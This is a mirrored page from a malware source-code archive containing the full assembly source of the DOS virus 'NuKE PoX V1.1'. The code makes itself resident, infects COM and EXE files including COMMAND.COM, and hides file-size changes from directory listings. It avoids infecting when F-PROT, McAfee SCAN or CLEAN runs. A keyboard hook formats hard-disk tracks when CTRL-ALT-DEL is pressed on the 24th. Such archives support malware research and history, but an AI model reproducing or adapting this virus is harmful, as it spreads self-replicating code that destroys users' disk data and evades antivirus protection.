mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
498 lines
37 KiB
NASM
498 lines
37 KiB
NASM
|
;*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
;-* (c) Rock Steady, Viral Developments -*
|
||
|
;*- (c) NuKE Software Developement 1991, 1992 *-
|
||
|
;-* Virus: NuKE PoX Version 1.1 (Alias: Evil Genius, NPox) -*
|
||
|
;*- ~~~~~~ *-
|
||
|
;-* Notes: Resident EXE & COM Infecting, Memory Stealth, Directory -*
|
||
|
;*- ~~~~~~ Stealth (FCB Method), Anti-Viral Products Aware, Infects *-
|
||
|
;-* COMMAND.COM on first Run, CTRL-ALT-DEL Aware... -*
|
||
|
;*- Bytes: 963 Bytes Memory: 963 Bytes *-
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
|
||
|
virus_size equ last - init_virus
|
||
|
mut1 equ 3
|
||
|
mut2 equ 1
|
||
|
mut3 equ 103h
|
||
|
del_code equ 53h
|
||
|
|
||
|
seg_a segment byte public
|
||
|
assume cs:seg_a, ds:seg_a
|
||
|
org 100h
|
||
|
rocko proc far
|
||
|
|
||
|
start: jmp init_virus
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Virus Begins Here...
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
init_virus:
|
||
|
call doit_now ;Doit VirusMan...
|
||
|
|
||
|
doit_now: pop bp ;Not to Lose Track
|
||
|
sub bp,106h ;Set our position
|
||
|
push ax ;Save all the registers
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push si
|
||
|
push di
|
||
|
push bp
|
||
|
push es
|
||
|
push ds
|
||
|
|
||
|
mov ax,7bcdh ;Are we resident Already?
|
||
|
int 21h
|
||
|
cmp bx,7bcdh ;Yupe... Quit Then...
|
||
|
je exit_com
|
||
|
|
||
|
xor bx,bx
|
||
|
push cs ;Get CS=DS
|
||
|
pop ds
|
||
|
mov cx,es
|
||
|
|
||
|
mov ax,3509h ;Hook Int 9 Please...
|
||
|
int 21h
|
||
|
mov word ptr cs:[int9+2][bp],es
|
||
|
mov word ptr cs:[int9][bp],bx
|
||
|
|
||
|
mov ax,3521h ;Sometimes tend to intercept
|
||
|
int 21h ;This Interrupt...
|
||
|
mov word ptr cs:[int21+2][bp],es ;Save the Int
|
||
|
mov word ptr cs:[int21][bp],bx ;Vector Table
|
||
|
|
||
|
dec cx ;Get a new Memory block
|
||
|
mov es,cx ;Put it Back to ES
|
||
|
mov bx,es:mut1
|
||
|
mov dx,virus_size ;Size to `Hide'
|
||
|
mov cl,4 ;And all this crap hides
|
||
|
shr dx,cl ;your number od bytes in DX
|
||
|
add dx,4
|
||
|
mov cx,es
|
||
|
sub bx,dx
|
||
|
inc cx
|
||
|
mov es,cx
|
||
|
mov ah,4ah ;Call int to do it...
|
||
|
int 21h
|
||
|
|
||
|
jc exit_com
|
||
|
mov ah,48h
|
||
|
dec dx
|
||
|
mov bx,dx ;It's Done... Yeah!
|
||
|
int 21h
|
||
|
|
||
|
jc exit_com
|
||
|
dec ax
|
||
|
mov es,ax
|
||
|
mov cx,8h ;Here we move our Virus into
|
||
|
mov es:mut2,cx ;the `Hidden' memory!
|
||
|
sub ax,0fh
|
||
|
mov di,mut3
|
||
|
mov es,ax
|
||
|
mov si,bp
|
||
|
add si,offset init_virus
|
||
|
mov cx,virus_size
|
||
|
cld
|
||
|
repne movsb
|
||
|
|
||
|
mov ax,2521h ;Restore Int21 with ours
|
||
|
mov dx,offset int21_handler ;Where it starts
|
||
|
push es
|
||
|
pop ds
|
||
|
int 21h
|
||
|
|
||
|
mov ax,2509h ;Restore Int9 with ours
|
||
|
mov dx,offset int9_handler ;The Handler...
|
||
|
int 21h
|
||
|
|
||
|
push cs
|
||
|
pop ds
|
||
|
exit_com:
|
||
|
cmp word ptr cs:[buffer][bp],5A4Dh
|
||
|
je exit_exe_file ;Its an EXE file...
|
||
|
mov bx,offset buffer ;Its a COM file restore
|
||
|
add bx,bp ;First three Bytes...
|
||
|
mov ax,[bx] ;Mov the Byte to AX
|
||
|
mov word ptr ds:[100h],ax ;First two bytes Restored
|
||
|
add bx,2 ;Get the next Byte
|
||
|
mov al,[bx] ;Move the Byte to AL
|
||
|
mov byte ptr ds:[102h],al ;Restore the Last of 3 Bytes
|
||
|
pop ds
|
||
|
pop es
|
||
|
pop bp ;Restore Regesters
|
||
|
pop di
|
||
|
pop si
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
mov ax,100h ;Jump Back to Beginning
|
||
|
push ax ;Restores our IP (a CALL
|
||
|
retn ;Saves them, now we changed
|
||
|
int21 dd ? ;Our Old Int21
|
||
|
int9 dd ? ;Our Old Int9
|
||
|
|
||
|
exit_exe_file:
|
||
|
mov bx,word ptr cs:[buffer+22][bp] ;Load CS Regester
|
||
|
mov dx,cs
|
||
|
sub dx,bx
|
||
|
mov ax,dx
|
||
|
add ax,word ptr cs:[exe_cs][bp] ;Get original CS
|
||
|
add dx,word ptr cs:[exe_ss][bp] ;Get original SS
|
||
|
mov bx,word ptr cs:[exe_ip][bp] ;Get original IP
|
||
|
mov word ptr cs:[fuck_yeah][bp],bx ;Restore IP
|
||
|
mov word ptr cs:[fuck_yeah+2][bp],ax ;Restore CS
|
||
|
mov ax,word ptr cs:[exe_sp][bp] ;Get original SP
|
||
|
mov word ptr cs:[Rock_Fix1][bp],dx ;Restore SS
|
||
|
mov word ptr cs:[Rock_Fix2][bp],ax ;Restore SP
|
||
|
pop ds
|
||
|
pop es
|
||
|
pop bp
|
||
|
pop di
|
||
|
pop si
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
db 0B8h ;This is now a MOV AX,XXXX
|
||
|
Rock_Fix1: ;XXXX is the original SS
|
||
|
dw 0 ;Our XXXX Value
|
||
|
cli ;Disable Interrupts
|
||
|
mov ss,ax ;Mov it to SS
|
||
|
db 0BCh ;This is now a MOV SP,XXXX
|
||
|
Rock_Fix2:
|
||
|
dw 0 ;The XXXX Value for SP
|
||
|
sti ;Enable interrupts
|
||
|
db 0EAh ;JMP XXXX:YYYY
|
||
|
fuck_yeah:
|
||
|
dd 0 ;Dword IP:CS (Reverse order!
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Int 9 Handler
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
int9_handler: ;Every TIME a KEY is pressed
|
||
|
push ax ;This ROUTINE is called!
|
||
|
in al,60h ;Has the user attempted a
|
||
|
cmp al,del_code ;CTRL-ALT-DEL
|
||
|
je warm_reboot ;Yes! Screw him
|
||
|
bye_bye: pop ax
|
||
|
jmp dword ptr cs:[int9] ;Nope, Leave system alone
|
||
|
warm_reboot:
|
||
|
mov ah,2ah ;Get Date Please
|
||
|
int 21h
|
||
|
cmp dl,18h ;Is it 24th of the Month?
|
||
|
jne bye_bye ;Yes, bye_Bye HD
|
||
|
mov ch,0
|
||
|
hurt_me: mov ah,05h
|
||
|
mov dh,0
|
||
|
mov dl,80h ;Formats a few tracks...
|
||
|
int 13h ;Hurts So good...
|
||
|
inc ch
|
||
|
cmp ch,20h
|
||
|
loopne hurt_me
|
||
|
db 0eah,0f0h,0ffh,0ffh,0ffh ;Reboot!
|
||
|
iret
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Dir Handler
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
dir_handler:
|
||
|
pushf
|
||
|
push cs
|
||
|
call int21call ;Get file Stats
|
||
|
test al,al ;Good FCB?
|
||
|
jnz no_good ;nope
|
||
|
push ax
|
||
|
push bx
|
||
|
push es
|
||
|
mov ah,51h ;Is this Undocmented? huh...
|
||
|
int 21h
|
||
|
|
||
|
mov es,bx
|
||
|
cmp bx,es:[16h]
|
||
|
jnz not_infected ;Not for us man...
|
||
|
mov bx,dx
|
||
|
mov al,[bx]
|
||
|
push ax
|
||
|
mov ah,2fh ;Get file DTA
|
||
|
int 21h
|
||
|
|
||
|
pop ax
|
||
|
inc al
|
||
|
jnz fcb_okay
|
||
|
add bx,7h
|
||
|
fcb_okay: mov ax,es:[bx+17h]
|
||
|
and ax,1fh ;UnMask Seconds Field
|
||
|
xor al,1dh ;Is in 58 seconds?
|
||
|
jnz not_infected ;Nope...
|
||
|
and byte ptr es:[bx+17h],0e0h
|
||
|
sub es:[bx+1dh],virus_size ;Yes minus virus size
|
||
|
sbb es:[bx+1fh],ax
|
||
|
not_infected: pop es
|
||
|
pop bx
|
||
|
pop ax
|
||
|
no_good: iret
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Int 21 Handler
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
int21_handler:
|
||
|
cmp ax,4b00h ;File executed
|
||
|
je execute
|
||
|
cmp ah,11h ;Dir handler
|
||
|
je dir_handler
|
||
|
cmp ah,12h ;Next file Dir handler
|
||
|
je dir_handler
|
||
|
cmp ax,7bcdh ;Virus testing
|
||
|
jne int21call
|
||
|
jmp execute
|
||
|
int21call:
|
||
|
jmp dword ptr cs:[int21] ;Split...
|
||
|
execute:
|
||
|
push ax
|
||
|
push bx
|
||
|
push cx
|
||
|
push dx
|
||
|
push si
|
||
|
push di
|
||
|
push es
|
||
|
push ds
|
||
|
|
||
|
cmp ax,7bcdh ;Was Virus testing if it was
|
||
|
jne continue ;Alive? If No Continue
|
||
|
push cs
|
||
|
pop ds ;If Yes, Check if COMMAND.CO
|
||
|
mov dx,offset command ;Is infected! And return
|
||
|
jmp continue2
|
||
|
continue:
|
||
|
call check_name ;Make sure file executed
|
||
|
jc exit_now ;Ain't a Anti-Viral program
|
||
|
continue2: ;With the CRC-32 checkers
|
||
|
mov ax,4300h ;Get file Attribs
|
||
|
int 21h
|
||
|
jc exit
|
||
|
|
||
|
test cl,1h ;Make sure there normal
|
||
|
jz open_file ;Okay there are
|
||
|
and cl,0feh ;Nope, Fix them...
|
||
|
mov ax,4301h ;Save them now
|
||
|
int 21h
|
||
|
jc exit
|
||
|
|
||
|
open_file: mov ax,3D02h
|
||
|
int 21h ;Open File to Infect please
|
||
|
|
||
|
jc exit ;Error Split
|
||
|
mov bx,ax ;BX File handler
|
||
|
mov ax,5700h ;Get file TIME + DATE
|
||
|
int 21h
|
||
|
|
||
|
mov al,cl
|
||
|
or cl,1fh ;Un mask Seconds
|
||
|
dec cx ;60 seconds
|
||
|
dec cx ;58 seconds
|
||
|
xor al,cl ;Is it 58 seconds?
|
||
|
jz exit ;File already infected
|
||
|
|
||
|
push cs
|
||
|
pop ds
|
||
|
mov word ptr ds:[old_time],cx ;Save Time
|
||
|
mov word ptr ds:[old_date],dx ;Save Date
|
||
|
|
||
|
mov ah,3Fh
|
||
|
mov cx,20h
|
||
|
mov dx,offset ds:[buffer] ;Read first 20h bytes
|
||
|
int 21h
|
||
|
|
||
|
jc exit_now ;Error Split
|
||
|
mov ax,4202h ;Move file pointer to end of
|
||
|
xor cx,cx ;file...
|
||
|
xor dx,dx
|
||
|
int 21h
|
||
|
|
||
|
jc exit_now ;Error Split
|
||
|
cmp word ptr cs:[buffer],5A4Dh ;Is file an EXE?
|
||
|
je exe_file ;JMP to EXE Infector
|
||
|
mov cx,ax
|
||
|
sub cx,3 ;Set the JMP
|
||
|
mov word ptr cs:[jump_address+1],cx
|
||
|
call infect_me ;Infect!
|
||
|
jc exit_now ;error split
|
||
|
mov ah,40h ;Write back the firs
|
||
|
mov dx,offset ds:[jump_address] ;bytes
|
||
|
mov cx,3h
|
||
|
int 21h
|
||
|
exit_now:
|
||
|
mov cx,word ptr cs:[old_time] ;Restore old time
|
||
|
mov dx,word ptr cs:[old_date] ;Restore Old date
|
||
|
mov ax,5701h
|
||
|
int 21h
|
||
|
exit_now2:
|
||
|
mov ah,3Eh
|
||
|
int 21h ;Close File now...
|
||
|
exit:
|
||
|
pop ds
|
||
|
pop es
|
||
|
pop di
|
||
|
pop si
|
||
|
pop dx
|
||
|
pop cx
|
||
|
pop bx
|
||
|
pop ax
|
||
|
cmp ax,7bcdh ;Virus checking if alive
|
||
|
jne leave_now ;No, Exit normally
|
||
|
mov bx,ax ;Yes, Fix BX with codez
|
||
|
leave_now:
|
||
|
jmp dword ptr cs:[int21] ;Jmp back to whatever
|
||
|
exe_file:
|
||
|
mov cx,word ptr cs:[buffer+20] ;IP Regester
|
||
|
mov word ptr cs:[exe_ip],cx ;Save IP Regester
|
||
|
mov cx,word ptr cs:[buffer+22] ;CS Regester
|
||
|
mov word ptr cs:[exe_cs],cx ;Save CS Regester
|
||
|
mov cx,word ptr cs:[buffer+16] ;SP Regester
|
||
|
mov word ptr cs:[exe_sp],cx ;Save SP Regester
|
||
|
mov cx,word ptr cs:[buffer+14] ;SS Regester
|
||
|
mov word ptr cs:[exe_ss],cx ;Save SS Regester
|
||
|
push ax
|
||
|
push dx
|
||
|
call multiply ;Figure a new CS:IP
|
||
|
sub dx,word ptr cs:[buffer+8]
|
||
|
mov word ptr cs:[buffer+22],dx ;Restore New CS
|
||
|
mov word ptr cs:[buffer+20],ax ;Restore New IP
|
||
|
pop dx
|
||
|
pop ax
|
||
|
add ax,virus_size
|
||
|
adc dx,0
|
||
|
push ax
|
||
|
push dx
|
||
|
call multiply ;Figure a new SS:SP
|
||
|
sub dx,word ptr cs:[buffer+8] ;Exe Size (512 Usuall
|
||
|
add ax,40h
|
||
|
mov word ptr cs:[buffer+14],dx ;New SS Pointer
|
||
|
mov word ptr cs:[buffer+16],ax ;New SP Pointer
|
||
|
pop dx
|
||
|
pop ax
|
||
|
|
||
|
push bx
|
||
|
push cx
|
||
|
mov cl,7 ;Fix for Header for
|
||
|
shl dx,cl ;new file size in 512
|
||
|
;byte pages
|
||
|
mov bx,ax
|
||
|
mov cl,9 ;And the remainder
|
||
|
shr bx,cl ;after dividing by
|
||
|
;512...
|
||
|
add dx,bx
|
||
|
and ax,1FFh
|
||
|
jz outta_here
|
||
|
inc dx
|
||
|
outta_here:
|
||
|
pop cx
|
||
|
pop bx
|
||
|
|
||
|
mov word ptr cs:[buffer+2],ax ;Save Remainder
|
||
|
mov word ptr cs:[buffer+4],dx ;Save Size in 512 pag
|
||
|
call infect_me ;INFECT File! Yeah!
|
||
|
jc exit_exe
|
||
|
|
||
|
mov ah,40h ;Write NEW EXE Header back
|
||
|
mov dx,offset ds:[buffer] ;to EXE File! Points to
|
||
|
mov cx,20h ;The Virus Now!!! ehhe
|
||
|
int 21h
|
||
|
exit_exe:
|
||
|
jmp exit_now
|
||
|
|
||
|
rocko endp
|
||
|
|
||
|
exe_ip dw 0 ;Original IP,CS,SP,SS From EXE
|
||
|
exe_cs dw 0 ;Header!
|
||
|
exe_sp dw 0
|
||
|
exe_ss dw 0
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Infection Routine...
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
infect_me proc near
|
||
|
mov ah,40h ;Write the New Encrypted
|
||
|
mov dx,offset init_virus ;Virus to File!
|
||
|
mov cx,virus_size
|
||
|
int 21h
|
||
|
|
||
|
jc exit_error ;Error Split
|
||
|
mov ax,4200h
|
||
|
xor cx,cx ;Pointer back to beginning
|
||
|
xor dx,dx ;file!
|
||
|
int 21h
|
||
|
|
||
|
jc exit_error ;Split Dude...
|
||
|
clc ;Clear carry flag
|
||
|
retn
|
||
|
exit_error:
|
||
|
stc ;Set carry flag
|
||
|
retn
|
||
|
infect_me endp
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Fix EXE Header...Gets new SS, CS Values for EXEs headers
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
multiply proc near
|
||
|
push bx
|
||
|
push cx
|
||
|
mov cl,0Ch
|
||
|
shl dx,cl
|
||
|
|
||
|
mov bx,ax
|
||
|
mov cl,4
|
||
|
shr bx,cl
|
||
|
|
||
|
add dx,bx
|
||
|
and ax,0Fh
|
||
|
pop cx
|
||
|
pop bx
|
||
|
retn
|
||
|
multiply endp
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
; Check to see if an `Anti-Viral' Product is being executed.
|
||
|
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
|
||
|
check_name proc near
|
||
|
push si
|
||
|
push cx
|
||
|
|
||
|
mov si,dx
|
||
|
mov cx,128h
|
||
|
loop_me:
|
||
|
cmp byte ptr ds:[si],2Eh ;Find ASCIIZ String
|
||
|
je next_ok
|
||
|
inc si
|
||
|
loop loop_me
|
||
|
next_ok:
|
||
|
cmp ds:[si-2],'TO' ;Is it ??PROT.EXE (F-PROT)
|
||
|
jne next_1 ;Naaa
|
||
|
cmp ds:[si-4],'RP'
|
||
|
je bad_file ;Yupe...
|
||
|
next_1:
|
||
|
cmp ds:[si-2],'NA' ;Is it SCAN.EXE (McAffee)
|
||
|
jne next_2 ;Naaa
|
||
|
cmp ds:[si-4],'CS'
|
||
|
je bad_file ;Yupe...
|
||
|
next_2:
|
||
|
cmp ds:[si-2],'NA' ;is it ?LEAN.EXE (Clean.EXE
|
||
|
jne next_3 ;Naaa
|
||
|
cmp ds:[si-4],'EL'
|
||
|
je bad_file ;Yupe...
|
||
|
next_3:
|
||
|
pop cx
|
||
|
pop si ;good file Set CARRY FLAG
|
||
|
clc ;to normal
|
||
|
retn
|
||
|
bad_file:
|
||
|
pop cx ;Bad file, Set CARRY FLAG
|
||
|
pop si ;ON!!!
|
||
|
stc
|
||
|
retn
|
||
|
check_name endp
|
||
|
|
||
|
command db "C:\COMMAND.COM",0 ;What to infect!
|
||
|
old_time dw ?
|
||
|
old_date dw ?
|
||
|
jump_address db 0E9h,90h,90h
|
||
|
buffer db 90h,0CDh,020h
|
||
|
db 30h DUP (?)
|
||
|
msg db "NukE PoX V1.1 - R.S"
|
||
|
last:
|
||
|
seg_a ends
|
||
|
|
||
|
end start
|